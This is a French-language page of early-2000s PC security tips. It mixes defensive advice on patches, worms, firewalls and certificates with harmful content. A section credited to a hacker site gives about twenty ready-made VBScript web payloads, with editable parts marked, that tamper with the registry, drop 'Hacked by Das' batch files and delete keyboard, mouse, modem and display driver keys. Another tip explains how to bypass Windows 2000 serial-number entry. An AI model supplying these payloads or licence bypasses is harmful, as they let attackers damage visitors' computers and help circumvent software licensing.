Astuces securite

Imprimer
Précedent
Accueil
Suivant
SOMMAIRE

Liens secuser.com*****
http://www.anti-hack.org/files/anti-hack.org
hardware.erecrut.com
hardware.fr

______________________________________________________
Trouver un logiciel de contrôle parental:
http://www.controlkids.com/fr/
sur telecharger.com
sur telecharger.com
Sur google
sur amazon.fr
______________________________________________________
Rustine Outlook contre le bug ouverture automatique de fichiers joints
Rustine Outlook contre le bug ouverture automatique de fichiers joints
Description: Ce correctif cité dans la mise à jour critique q290108 empèche un correspondant mal intentionné d'executer un fichier sur votre disque sans votre accord. INDISPENSABLE
Version: Taille: 488.28 Kb
Lien ______________________________________________________
Cacher les icônes "Utilisateurs" et "Mot de passe"
fichier control.ini qui se trouve dans le dossier Windows et à la section "[don't load]" on ajoute ces deux lignes : Inetcpl.cpl=no pasword.cpl=no Ainsi, les deux icônes "Utilisateurs" et "Mot de passe" qui se trouvent dans le panneau de configuration ne seront plus visibles.
______________________________________________________

______________________________________________________
JDBGMGR.EXE
JDBGMGR.EXE est un programme faisant partie de Windows dont le nom complet Microsoft Debugger Registrar for Java. Il est représenté par une icône en forme d'ours en peluche de couleur grise.
Il fait l'objet d'un hoax (fausse alerte) mais peut également être atteint par un virus (le plus communément par W32/Magistr@MM ou par W32.Efortune.31384@mm).
Si vous avez effacé JDBGMGR.EXE, lisez les instructions
Lien
______________________________________________________
Sécurité de Windows XP:
Windows XP est équipé en standard d'un Firewall, que vous activez ou non. Afin de rendre vos dossier confidentiels et qu'un intrus accède à votre bureau, verrouillez-en l'accès en créant un mot de passe.
Nul peut accéder à vos dossiers non partagés à partir d'une autre session d'utilisateur.
Activation & Enregistrement:
Une fenêtre vous propose d'activer votre session de Windows XP par courrier, par téléphone ou en ligne par internet.
Attention, distinguez l'activation à l'enregistrement.
Si vous n'activez pas votre version , le système se bloque après 30 jours.
Windows XP est gourmand :
La configuration minimale indiquée sur la boite est seulement de 64 Mo de Ram.
Pour travailler confortablement, même en session unique, 128 Mo sont vite nécessaires, donc nous vous conseillons 256 Mo pour plus de sureté.
Pour ce qui est de la fréquence du processeur une puce cadencée de 400 à 450 Mhz semble satisfaire aux besoins.
Il faut savoir que Windows XP pèse à lui seul 600 MO par rapport à Windows 98 qui lui ne pèse que 200 MO
______________________________________________________
Sécurité Electrique :
La sécurité électrique consiste à protéger votre matériel contre les micro-coupures, les surtensions et la foudre.

Micro-coupures :
Les micro-coupures seront protégées par l'achat d'un onduleur. Cet appareil n'est pas indispensable. L'onduleur protègera également votre matériel contre les surtensions (sauf le modem). Dans ce cas il risque d'être inutilisable par la suite.

Surtension, foudre : En cas de menace d'orage, débrancher votre équipement ainsi que votre prise téléphonique.
Dans le commerce vous trouverez des blocs électriques ayant une protection pour le secteur ET le téléphone. Si la foudre vient à frapper, cet appareil sera hors service mais votre matériel ne subira pas de dommage sauf exception.
Remarque : Aucun fabricant ne vous garantira une protection absolue contre les surtensions liées à la foudre.
______________________________________________________
Eviter la saisie du numéro de série Windows 2000:
Ca arrive de temps en temps qu'on ait perdu le numero de série de son Windows 2000 ;-) Il y a deux moyens simples de passer au travers de la saisie d'un numéro de série à l'installation de Windows.
1ère technique,c est d'éditer le fichier setupp.ini ,tu verras alors une ligne avec ecrit PID=51873XXX .Remplace le XXX par 270,et lance l'install.On ne te demandera pas de numero de série.
2ème technique,c est une technique qui commence à être connue et qui consiste à remplir toutes les cases du numéro de série par des 1. Ca donne donc un truc du style 11111-11111-11111-111111-1111 .Voila,c est valable pour pas mal de produits crosofts :)
______________________________________________________
Désactiver "l'éditeur de la base de registre"
Lancer "Regedit"
Cherchez HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Cliquez avec le bouton droit sur la page de droite
Sélectionnez "Nouveau", Valeur Dword
Nommez la DisableRegistryTools
Affectez lui la valeur 1
______________________________________________________
Désactiver la "commande Éxécuter"
Lancer "Regedit"
Cherchez HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Cliquez avec le bouton droit sur la page de droite
Sélectionnez "Nouveau", Valeur Dword
Nommez la NoRun
Affectez lui la valeur 1
______________________________________________________
Effacer son N° de série de windows
Lancer "Regedit"
Chercher HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ ProductKey
Et remplace là chaine par des xxxxx-xxxxx-xxxxx-xxxxx-xxxxx
______________________________________________________
Protégez vous contre le mouchard ICQ:
Ce logiciel super utile est un mouchard, il connait tout de vous: vos hobbies votre adresse... soit disant à but
commercial. Si vous n'avez pas de logiciel piraté vous ne risquez rien.
Pour se protéger faites démarrez, éxécuter, regedit puis
HKEY-current-user/Softawre/Mirabilis/ICQ/defaultpref/autoupdate (changez le yes en no)
______________________________________________________
Protégez vous contre les logiciels de pub:
Reconnaissez-vous avoir téléchargé un de ces logiciels ? (GoZilla, get Right, Cute FTp....clique ici pour voir toute la liste) Alors vous êtes infecté. Sur ces logiciels, une bannière de pub s'affiche pour donner un peu d'argent ou éditeur des logiciels. C'est Aureate qui fait ce système. Ca paraît pas mal à première vu mais quand vous naviguez sur Internet, vous envoyez des informations à cette entreprise (nom, site visité, temps de visites, la liste de vos logiciels...). Il parait même qu'il est souvent la cause de plantage du Pc. Incroyable non? Je vous assure, c'est la vérité. Comment s'en débarasser ? Télécharger le logiciel Optout qui se charge de tout ! (15/02/00)
______________________________________________________
Gare aux plantages de Microsoft, ils sont un peu bavards :
Lorsqu'une erreur fatale est détectée, une application nommée Dw.exe ou Dw15.exe s'active. Celle-ci ferme le logiciel victime de l'erreur, mais s'assure d'abord de récolter quelques informations utiles. «DW.exe saisit les réglages de l'utilisateur reliés au plantage à même la base de registres et le bloc de mémoire où l'application tourne, explique Microsoft dans une fiche sur Office XP. DW.exe rassemble ensuite cette information et tous les fichiers d'appui — comme le fichier en cours au moment du plantage, des gabarits si nécessaire, et tous les fichiers associés utilisés par l'application au moment du plantage.»
Lien
______________________________________________________
Une fois de plus, une faille a été découverte concernant le navigateur de Microsoft ; une simple page html pourrait ordonner à IE de télécharger puis d'exécuter n'importe quel programme. Le bug consiste à faire passer un programme pour un son afin que Windows Media Player le lance automatiquement. La faille a été découverte par le SNS (Japon), et testé sur les versions nipponnes. Un patch correctif est disponible sur le site de Microsoft. Q321232: Security Update http://www.microsoft.com/windows/ie/downloads/critical/q321232/download.asp
______________________________________________________
Comment se protéger des virus contenus dans les ActiveX dans outlook : Cliquez sur le menu Outil/Options. Cliquez sur l'onglet Sécurité. Cocher la case: zone Sites sensibles (davantage sécurisée)
______________________________________________________
Outlook, une faille en moins... www.microsoft.com L'éditeur Microsoft a annoncé la disponibilité d'un correctif visant à sécuriser une faille concernant son traitement de texte Word. En effet, si ce dernier était utilisé comme éditeur de courrier électronique pour Outlook 2000 et 2002, un intrus pouvait exécuter un programme à distance sur la machine cible. Microsoft a donc mis à disposition le correctif MS02-021 à installer d'urgence si vous vous trouvez concerné. Enfin, le consultant informatique Georgi Guninski a souligné qu'une faille similaire existait sous Office XP mais avec Excel. En effet, un script ajouté à une pièce jointe au format ".xls" présente le même potentiel de dangerosité. Pour les paranoïaques, le consultant préconise la désactivation des Javascripts et autres ActiveX. Sachez toutefois qu'il s'agit d'une solution extrême et que bon nombre de sites Internet seront de ce fait inaccessibles. http://www.iweb-formation.com/Home.asp
______________________________________________________
W32.Badtrans.B@mm is a MAPI worm that emails itself out using different file names. It also creates the file \Windows\System\Kdll.dll. It uses functions from this file to log keystrokes. http://securityresponse.symantec.com/avcenter/venc/data/w32.badtrans.b@mm.html
______________________________________________________
ANTIVIRUS EN LIGNE :
http://housecall.antivirus.com/housecall/start_corp.asp
http://housecall.antivirus.com/housecall/start_corp.asp
http://www.anti-hack.org/virus.htm
http://www.thunderbyte.com

______________________________________________________
W32/Badtrans.B@mm  :
http://www.norman.com/virus_info/w32_badtrans_29090_mm.shtml

t will also set a key in the registry
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\Kernel32 = KERNEL32.EXE
in order to execute automatically during startup.
The attachment name can consist of one of the following pieces:

fun
Humor
docs
info
Sorry_about_yesterday
Me_nude
Card
SETUP
stuff
YOU_are_FAT!
HAMSTER
news_doc
New_Napster_Site
README
images
pics
S3MSONG
SEARCHURL

The attachment will have double extensions, where the first is either DOC, MP3 or ZIP, and the second is either PIF or SCR.

______________________________________________________
Protéger votre identité sur Internet
Vous pouvez utiliser un certificat personnel pour protéger votre identité sur Internet.
Un certificat est une mention garantissant l'identité d'une personne ou la sécurité d'un site Web.
Vous pouvez contrôler l'utilisation de votre identité en étant la seule personne à détenir la clé privée de votre système.
Utilisés conjointement à des logiciels de messagerie, les certificats de sécurité sont également dénommés "ID numériques."
Internet Explorer utilise deux types de certificats différents.
Un “ certificat personnel ” garantit que vous êtes bien celui ou celle que vous prétendez être. Ces informations sont utilisées lorsque vous envoyez des informations personnelles via Internet à un site Web qui exige un certificat garantissant votre identité.
Un “ certificat de site Web ” indique qu'un site Web donné est sécurisé et authentique. Il garantit qu'aucun autre site Web ne peut usurper l'identité du site sécurisé d'origine.
Comment fonctionnent les certificats de sécurité ?
Un certificat de sécurité, qu'il s'agisse d'un certificat personnel ou d'un certificat de site Web, associe une identité à une "clé publique."
Seul le propriétaire connaît la "clé privée" correspondante qui lui permet de "décrypter" ou d'envoyer une "signature numérique."
Lorsque vous envoyez votre certificat à des tiers, vous leur transmettez votre clé publique, de sorte à leur permettre de vous envoyer des informations que vous seul serez en mesure de décrypter et de lire au moyen de votre clé privée.
Le composant de signature numérique de votre certificat de sécurité constitue votre carte d'identité électronique. La signature numérique indique au destinataire que les informations transmises viennent bien de vous et qu'elles n'ont, en aucune manière, été falsifiées.
Avant d'être en mesure d'envoyer des informations cryptées ou signées de façon numérique, vous devez obtenir un certificat et configurer Internet Explorer de sorte à ce qu'il puisse l'utiliser.
Lorsque vous accédez à un site Web sécurisé (utilisant le protocole sécurisé "https"), ce site vous envoie automatiquement son certificat.
Comment obtenir vos propres certificats de sécurité ?
Les certificats de sécurité sont émis par des autorités de certification indépendantes.
Il existe différentes classes de certificats de sécurité, fournissant chacun un niveau d'authentification différent. Vous pouvez obtenir votre certificat de sécurité auprès d'autorités de certification.
Dernière mise à jour le jeudi 13 avril 2000
______________________________________________________
logiciels de contrôle parental:
Voici le résultat :
http://www.controlkids.com/fr/
http://telecharger.01net.com/windows/Internet/cont_parentale/
http://www.google.com/search?hl=fr&q=logiciel+%2Bcontrol+%2Binternet&btnG=Recherche+Google&lr=lang_fr
http://telecharger.01net.com/windows/Internet/cont_parentale/fiches/20955.html
http://www.amazon.fr/exec/obidos/ASIN/B00005QXMV/ref=ed_ec_h_cs_12_1/

______________________________________________________
Patch universel contre les virus VBscript
(0,1 Ko) : empêche les virus connus ou inconnus de type ILOVEYOU ou Kak de s'exécuter, même si vous en demander accidentellement l'ouverture. Dans ce cas, le virus est rendu inopérant, et une fenêtre texte s'affiche à l'écran avec son code source. Téléchargez le patch, ouvrez-le et confirmez éventuellement la modification de la base de registre (Win 95/98/NT).
http://www.secuser.com/telechargement/antivbsvirus.reg
REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\vbsfile\shell]
@="edit"

______________________________________________________
le virus BugBear
Liens
FxBgbear ( 175Ko) : recherche et élimine le virus BugBear (en cas de problème, vous pouvez aussi utiliser AntiBugBear).
. Pour que la désinfection soit complète, les utilisateurs de Windows Me ou XP doivent désactiver la restauration du système avant de scanner leur disque dur ;
. Pour télécharger un fichier en .COM, les utilisateurs de Netscape doivent faire un clic droit sur le lien puis choisir "Enregistrer le lien sous...".
______________________________________________________
les bugs Active X

Avant de pouvoir comprendre ces bugs, je vous conseille de lire ces quelques lignes vous donnant les clés s'executant au démarrage de Windows.
Ces informations sont communes à Windows 95 et 98 (ainsi qu'à Windows NT).
Cliquez sur
démarrer, executer et regedit. Voila vous êtes dans la base de registre. Ne modifiez surtout rien : celle ci est indispensable au bon fonctionnement de windows.
Voilà la clé des programmes qui s'execute au démarrage de Windows, c'est souvent dans une de ses clés que se cache un executable plus ou moins indésirable lancé systématiquement au démarrage de Windows :
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_USERS\xxxxxx\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_USERS\xxxxxx\Software\Microsoft\Windows\CurrentVersion\RunOnce
xxxxxx étant le nom d'un utilisateur (chiffré)
HKEY_USERS\xxxxxx\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
Vous y comprenez rien? Arf, c'est pourtant simple =)
Alors nous allons prendre un exemple :
Vous voulez changer le nom que vous aviez rentré au démarrage de Windows, allez dans
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version et modifiez RegisteredOwner et RegisteredOrganization.

BUG activeX
Vous pensiez être en sécurité en surfant sur Internet? Il n'en est rien. Quelqu'un peut utiliser ces bugs pour modifier le coeur de votre PC (si il tourne sousWindows) : la base de registre. Ce qui est écrit en bleu est le code html et ce qui est en rouge sont les régions modifiables =)

ECRIRE DANS LA BASE DE REGISTRE.

<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\das\With\Name", "Hacked by Das"
</script>
</body>
</html>


SUPPRIMER UNE CLE DANS LA BASE DE REGISTRE
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_LOCAL_MACHINE\hello\"
</script>
</body>
</html>



CREER UN RACCOURCI SUR LE BUREAU
<html>
<body>
<script Language="VBScript">
if location.protocol = "file:" then
Set WshShell = CreateObject("WScript.Shell")
Set FSO = CreateObject("Scripting.FileSystemObject")
HPath = Replace(location.href, "/", "\")
HPath = Replace(HPath, "file:\\\", "")
HPath = FSO.GetParentFolderName(HPath)
Set TRange = document.body.createTextRange
Set RealLink = WshShell.CreateShortcut("C:\WINDOWS\bureau\evolvae")
RealLink.TargetPath = "http://www.evolvae.cjb.net"
RealLink.Save
end if
</script>
</body>
</html>


CREER UN FICHIER BAT
<html>
<body>
<script Language="VBScript">
Set BatFile = FSO.CreateTextFile("c:\Windows\das.bat", 2, False)
BatFile.WriteLine ""
BatFile.WriteLine "Hacked by Das"
BatFile.Close
</script>
</body>
</html>

SUPPRIMER LES PROGRAMMES SE LANCANT AU DEMARRAGE
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run"
</script>
</body>
</html>


MODIFIER LE NOM DE L'ORDINATEUR
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ComputerName\"
WshShell.RegWrite "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ComputerName\ ComputerName\ComputerName","Hacked by Das"
</script>
</body>
</html>

SUPPRIMER LA FLECHE DES RACCOURCIS
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\IsShortcut"
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\piffile\IsShortcut"
</script>
</body>
</html>


SUPPRIMER LES PROGRAMMES SE LANCANT AU DEMARRAGE DE MS DOS
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Policies\ WinOldApp\Disabled",1,"REG_DWORD"
</script>
</body>
</html>


SUPPRIMER L'HISTORIQUE
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\explorer\ RecentDocs\"
WshShell.RegDelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\explorer\ RunMru\"
WshShell.RegDelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\explorer\ Doc Find Spec MRU\"
WshShell.RegDelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\explorer\ FindComputerMRU\"
</script>
</body>
</html>


DESINSTALLER L'IMPRIMANTE
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Printer\"
</script>
</body>
</html>


DESINSTALLER LE CLAVIER
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Keyboard\"
</script>
</body>
</html>


DESINSTALLER LE MODEM
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Modem\"
</script>
</body>
</html>


DESINSTALLER L'ECRAN
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Monitor\"
</script>
</body>
</html>


DESINSTALLER LE DISQUE DUR
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\PCMIA\"
</script>
</body>
</html>


SUPPRIMER NUKE NABBER
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\Sofware\NukeNabber 7.0"
</script>
</body>
</html>


CREER UN FICHIER BATH
<html>
<body>
<script Language="VBScript">
if location.protocol = "file:" then
Set FSO =CreateObject("Scripting.FileSystemObject")
HPath = Replace(location.href, "/", "\")
HPath = Replace(HPath, "file:\\\", "")
HPath = FSO.GetParentFolderName(HPath)
Set TRange = document.body.createTextRange
Set BatFile = FSO.CreateTextFile("c:\Windows\das.bat", 2, False)
BatFile.WriteLine ""
BatFile.WriteLine "Hacked by Das"
BatFile.Close
end if
</script>
</body>
</html>


DETRUIRE LES PILOTES DE LA SOURIS
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Mouse\"
</script>
</body>
</html>


ENLEVER LE MENU DEMARRER-->RECHERCHER
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ Explorer\NoFind", 0 ,"REG_DWORD"
</script>
</body>
</html>


ENLEVER LE MENU DEMARRER-->DOCUMENT
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ Explorer\NoRecentDocsMenu", 0 ,"REG_DWORD"
</script>
</body>
</html>


ENLEVER LE MENU DEMARRER-->EXECUTER
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ Explorer\NoRun", 0 ,"REG_DWORD"
</script>
</body>
</html>

 


______________________________________________________
les problèmes liés à la sécurité

1. La publicité piratée

Beaucoup d'organisations (au sens large) ouvrent un site web pour avoir une sorte de vitrine sur l'Internet où elles peuvent exposer leurs produits, activités, etc ... Une nouvelle sorte de piratage consiste à entrer illégalement sur le serveur web et à modifier les pages existantes. C'est un peu comme entrer dans un magasin et changer les choses exposées. Dans tous les cas, quand un site est piraté, la nouvelle page remplacée n'est pas pour promouvoir l'activité du propriétaire. Plusieurs exemples suivent pour illustrer ce nouveau problème.

1.1. Les administrations américaines

- Le 29 décembre 1996, un hacker a attaqué un site web de l'US Air Force et a remplacé la page principale par des images à caractère pornographique. Le résultat a été que le "DefenseLINK" du pentagone, qui inclue environ 80 homepages, a été débranché pendant plus de 24 heures pour que les officiels s'assurent qu'il n'y avait pas d'autres brêches de sécurité sur le système. Cette attaque a abîmé l'image de l'US Air Force en montrant que ses systèmes informatiques n'étaient pas vraiment sûrs. De plus, cette administration a dépensé une somme d'argent non négligeable pour vérifier l'intégrité de ses fichiers.

- Une autre attaque de site web s'est produite le 5 mars 1997 où la page principale de la NASA (National Aeronautics and Space Administration) a été piratée et le contenu changé. Les hackers l'ont remplacée par une nouvelle page exprimant des critiques sur les institutions américaines. (Site web de la NASA: http://www.hq.nasa.gov)

- Pendant l'été 1996, des hackers se sont introduits sur le serveur web de l'US Justice Department en plaçant des croix gammées et des images d'Adolf Hitler qu'ils considérait au même titre que le département de la justice américaine. Ils voulaient protester contre la position du gouvernement américain à contrôler l'Internet.

Les principales attaques sont dirigées vers les institutions américaines dans lesquelles les pirates voient une proie intéressante pour discréditer le gouvernement américain. Toutefois, il est important de signaler que les médias qui relaient ce type d'information ne font pas suivre le message des pirates mais au contraire les font passer pour des délinquants. La valeur de leur message en est donc occulté contrairement aux exemples que nous allons voir ci-dessous.

1.2. Les autres organisations

- Le 10 février 1997 et encore le 14 février 1997, des hackers portugais ont lancé une attaque politique sur la page web du gouvernement indonésien en insistant que ce pays continuait une oppression sur le Timor Est. Ils voulaient attirer l'attention sur la nécessité de l'indépendance du peuple du Timor oppressé depuis des décades par le gouvernement d'Indonésie.

- Le site des fourrures Kriegsman fut attaqué en novembre 1996 par un activiste anti-fourrure. La nouvelle page bien évidemment ne promouvait pas cette entreprise.

Nous avons ici deux exemples de sites web piratés par des hackers pour défendre une cause. Le geste est le même que pour les exemples de la partie précédente mais la porté médiatique en est multipliée. Ce qui montre que la sécurité d'un site web n'est pas à prendre à la légère notamment pour les entreprises.

2. L'espionnage industriel et militaire

De nos jours, une grande majorité des serveurs Internet appartiennent aux entreprises. Beaucoup de compagnies en profite pour utiliser l'Internet comme réseau de transmission de données intra-entreprise. Il y a un grand nombre d'exemples de serveurs Internet d'entreprise hackés. Un bon exemple est le serveur de Boeing où il y a quelques années, deux collégiens étaient rentrés en effraction dans un des ordinateurs de la compagnie afin de rechercher des fichiers de mots de passe. De plus, Boeing a trouver l'évidence que les hackers ont obtenu l'accès "root" à la maison fédérale de Seattle. Le département de justice américaine avait dit que cela était une situation classique dans laquelle les pirates peuvent influer sur les coûts de production. En effet, les pirates ont très bien pu voler certains fichiers secrets et les distribuer sur l'Internet ou à des compagnies rivales. Après que le cas fut fini, il couta à Boeing 57.000 Dollars simplement pour vérifier l'intégrité de ses données d'avioniques. En réalité, le principal risque est le vol de données confidentielles, mais il y a aussi un autre risque, c'est le risque de données modifiées. En effet, le pirate peut très bien changer les données actuelles par de fausses. Alors, l'entreprise travaillerait avec des informations altérées et pourrait produire des résultats erronés sans s'en rendre compte. C'est pourquoi Boeing dépensa tant d'argent pour vérifier toute l'intégrité de ses données. Un autre exemple en 1987, une petite erreur comptable de 75 cents révella qu'un intrus s'était ouvert lui-même un compte dans le système informatique du laboratoire "Lawrence Berkeley". Les traces du compte provennait d'un programmeur d'Allemagne de l'est qui avait copié des documents des ordinateurs militaires attachés à MILNET (Le segment Internet réservé pour les utilisations militaires). Les documents furent vendus au KGB. Le groupe Gartner William Malik (Célèbre groupe d'avocats américains) affirme que un de ses clients, une très grande compagnie de produits manufacturés, a perdu 900 millions de dollars parce que un de ses concurrents avait pirater plusieurs ordinateurs de l'entreprise et avait tout appris sur ses projets.

Les exemples de cette sorte sont abondants dans le monde de l'Internet. Toutefois, un grand nombre d'attaques ne sont pas rapportées au public parce qu'elles pourraient porter atteinte à la compagnie ou bien parce qu'elles ne sont pas détectées par l'administrateur réseau de l'entreprise.

3. L'intégrité du commerce

La sécurité des cartes de crédit est un des principaux enjeux de la sécurité sur Internet à cause de l'énorme potentiel de ce nouveau commerce mondial qui se développe à une vitesse impressionnante. Tout cela laisse évidemment une grande place à la fraude des cartes de crédit. Il y a un grand nombre de magasins virtuels sur l'Internet qui vendent des livres, des composants d'ordinateurs, des vêtements, etc ... Tous ces magasins virtuels utilisent la méthode de paiement par carte de crédit. Ce qui signifie que le consommateur envoie son numéro de carte de crédit au magasin virtuel qui alors débite le montant du compte bancaire propriétaire de la carte de crédit. Mais il y a deux problèmes. Premièrement, la transmission du numéro de carte de crédit peut être interceptée par une tierce personne sans l'accord, bien évidemment, ni du marchant et ni du consommateur. Deuxièmement, une majorité de ces sites commerciaux ne sont pas sécurisés. Même si la transmission du numéro de carte de crédit à travers l'Internet est sûr, les moyens de le stocker sur le serveur ne le sont pas forcément. Les fichiers de numéros de cartes de crédit dans la base de données d'une entreprise peuvent être piratés. Plusieurs compagnies spécialisées dans le commerce sur Internet ont déjà été hackées à la recherche des fichiers clients de numéros de carte de crédit. Par exemple, le fournisseur d'accès Internet Netcom de San Jose (Californie, USA) en a déjà subit les conséquences. Et le célèbre hacker Kevin Mitnick avait volé environ 17.000 numéros de cartes de crédit avant de se faire capturer par des détectives hi-tech. Pendant que le commerce sur l'Internet devient un marché de plusieurs centaines de millions de francs, cela devient aussi une grande problématique en terme de sécurité pour les échanges commerciaux entre les clients et les marchants.

4. La mise hors service des serveurs

Les serveurs fournissants des services basés sur le protocole TCP (WWW, email, newsgroup, gopher, telnet, etc ...) à la communauté Internet peuvent devenir incapable de fournir ses services lorsqu'ils sont sous le coup d'une attaque et même pendant un certain temps après cette dernière. Le service en lui même n'est pas endommagé par l'attaque; généralement seulement la capacité à fournir ce service est mis hors service. Dans certains cas, le système va jusqu'à épuiser toutes ses ressources mémoire, crasher ou sinon devenir inopérant. Ces attaques bloquent le système temporairement, donc durant ce temps inutilisé, la compagnie propriétaire du système peut perdre de l'argent notamment si le service proposé est un service de vente par Internet.

 

Texte tiré du site Evolvae Hackers Network
( Vous pouvez recopier ce texte ou le mettre
sur votre site du moment que vous mettez
un lien vers EH Network )
[ http://www.evolvae.cjb.net ]

______________________________________________________
les solutions pour la sécurité

Dans cette partie nous allons découvrir les méthodes utilisées pour améliorer la sécurité sur Internet. Les deux principaux espoirs de la sécurité sur Internet résident dans la cryptographie et les firewalls.

1. Les firewalls

Les firewalls sont souvent appelés les préservatifs pour les réseaux des entreprises. Ils fournissent une protection digitale associée à la rapide croissance des réseaux et de la commercialisation de l'Internet. Comme les préservatifs, beaucoup de gens ont entendu parler des firewalls mais peu de personnes les utilisent. De plus, le nombre d'incidents de sécurité grandissant sur Internet laisse suggérer très fortement que trop peu de personnes les utilisent correctement.

1.1. Qu'est ce qu'un firewall ?

Un firewall est une sorte de technologie de contrôle d'accès qui empêche les accès non-autorisés aux ressources d'information en placant une barrière entre le réseau de l'entreprise et le réseau non-sécurisé (Internet, par exemple). Un firewall est aussi utilisé pour empêcher les transferts d'information propriétaire du réseau de l'entreprise. En d'autres mots, un firewall fonctionne comme une passerelle controlant le traffic dans les deux directions.

Le firewall typique est un ordinateur bon marché fonctionnant avec UNIX éloigné de toute donnée confidentielle qui est placé entre Internet et le réseau de l'entreprise. Certains firewalls ne permettent que le passage de l'email protégeant ainsi tout le réseau contre toutes les attaques possibles autres que contre le service email. D'autres firewalls fournissent moins de restrictions et bloquent les services qui sont connus pour être une source de problèmes.

Généralement, les firewalls sont configurés pour protéger contre les connexions interactives (Telnet par exemple) provenant du " monde extérieur ". Ceci, plus que toute chose, aide à empêcher les agresseurs de se connecter sur les machines du réseau intérieur. Les firewalls les plus élaborés bloquent le traffic de l'extérieur vers l'intérieur mais permettent aux utilisateurs de l'intérieur de communiquer librement avec l'extérieur.

Les firewalls sont d'autant plus importants qu'ils fournissent un point de rencontre où la sécurité et la vérification peuvent être imposés. Dans une situation où un ordinateur est attaqué par quelqu'un, le firewall peut agir comme une cassette enregistrable et un outils de tracage.

1.2. Qu'est-ce qu'un firewall ne peut pas faire ?

Les firewalls ne peuvent pas protéger contre les attaques qui ne passent pas par le firewall. Beaucoup d'entreprises qui se connectent à l'Internet sont très concernées par les fuites de données propriétaires qui passe par ce chemin. Malheureusement pour ces concernées une disquette magnétique peut être utilisée tout aussi efficacement pour transférer des données. La politique du firewall doit être réaliste et refléter le niveau de sécurité du réseau de l'entreprise. Par exemple, un site avec des données top secrètes ne doit pas avoir de firewall du tout : il ne doit tout simplement pas avoir sa place sur l'Internet. Les systèmes avec des données confidentielles et secrètes doivent être isolés du reste du réseau dans l'entreprise.

Les firewalls ne peuvent pas vraiment protéger contre les choses comme les virus. Il y a trop de sorte d'encoder des fichiers exécutable pour les transférer à travers les réseaux. Il y a également trop d'architectures différentes et de virus pour essayer de les chercher. En d'autres mots, un firewall ne remplace pas la sécurité et la conscience de la part des utilisateurs. En général, un firewall ne protège pas contre les attaques orientées données (attaques dans lesquelles quelque chose est mailé ou copié vers un ordinateur interne où il sera ensuite exécuté). Cette forme d'attaque s'est produite dans les anciennes et nombreuses versions de " Sendmail ".

1.3. Conclusion

Il y a beaucoup de sortes de firewalls. Toutefois, la principale part des firewalls sont des programmes installés sur le routeur de l'entreprise ou sur un autre ordinateur. Il existe quand même des firewalls " hardware " qui sont plus rares. Ce sont des cartes électroniques qui sont branchées dans l'ordinateur.

